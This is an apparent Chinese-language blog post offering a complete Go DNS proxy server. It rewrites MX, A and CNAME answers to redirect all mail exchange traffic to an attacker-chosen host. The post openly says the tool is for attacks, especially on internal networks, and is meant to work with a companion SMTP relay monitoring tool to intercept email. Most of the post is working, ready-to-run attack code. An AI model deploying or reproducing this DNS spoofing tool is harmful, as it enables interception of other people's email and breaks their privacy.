軟件介紹:
本身爲獨立執行程序,跨平臺,可以充當正常dns服務器。默認情況下,本程序只篡改MX(郵件交換記錄)爲特定主機。
作用:
本軟件 與 本博客前文中的 smtp 中繼監控服務器程序 結合來實施攻擊,特別在內網中。
其他:
如果需要實現高級的基於特定域名的篡改,修改代碼即可。
package main
import (
"flag"
"fmt"
"github.com/miekg/dns"
"os"
"strings"
)
var (
remote = "114.114.114.114:53"
local = ":53"
quiet = true
server string
ip string
)
func main() {
s := flag.String("Dom", "mail.yk.com", "請輸入所有mx服務器要轉發的FQDN(例如:mail.xxx.com)【可選】")
host := flag.String("Add", "127.0.0.1", "請輸入所有mx服務器要轉發的IP地址(例如:192.168.1.1)")
flag.Parse()
server = *s + "."
ip = *host
dns.HandleFunc(".", proxyServe)
failure := make(chan error, 1)
go func(failure chan error) {
failure <- dns.ListenAndServe(local, "tcp", nil)
}(failure)
go func(failure chan error) {
failure <- dns.ListenAndServe(local, "udp", nil)
}(failure)
fmt.Println(<-failure)
os.Exit(1)
}
func proxyServe(w dns.ResponseWriter, req *dns.Msg) {
defer func() {
if err := recover(); err != nil {
fmt.Println(err)
}
}()
if req.MsgHdr.Response == true { // supposed responses sent to us are bogus
return
}
c := new(dns.Client)
c.Net = "udp"
m, _, err := c.Exchange(req, remote)
if !quiet {
fmt.Println(req)
fmt.Println(m)
}
if err != nil {
fmt.Println(err)
} else {
if m.Question[0].Qtype == 1 { //15 表示A記錄
if m.Question[0].Name == server {
n := len(m.Answer)
for i := 0; i < n; i++ {
s := strings.Fields(m.Answer[i].String())
s[4] = ip
m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
}
}
}
if m.Question[0].Qtype == 5 { //=5 表示CN記錄
if m.Question[0].Name == server {
n := len(m.Answer)
for i := 0; i < n; i++ {
s := strings.Fields(m.Answer[i].String())
if s[3] == "A" {
s[4] = ip
m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
}
}
}
}
if m.Question[0].Qtype == 15 { //15 表示MX記錄
n := len(m.Answer)
for i := 0; i < n; i++ {
s := strings.Fields(m.Answer[i].String())
s[5] = server
m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
}
}
w.WriteMsg(m)
}
}
下載地址: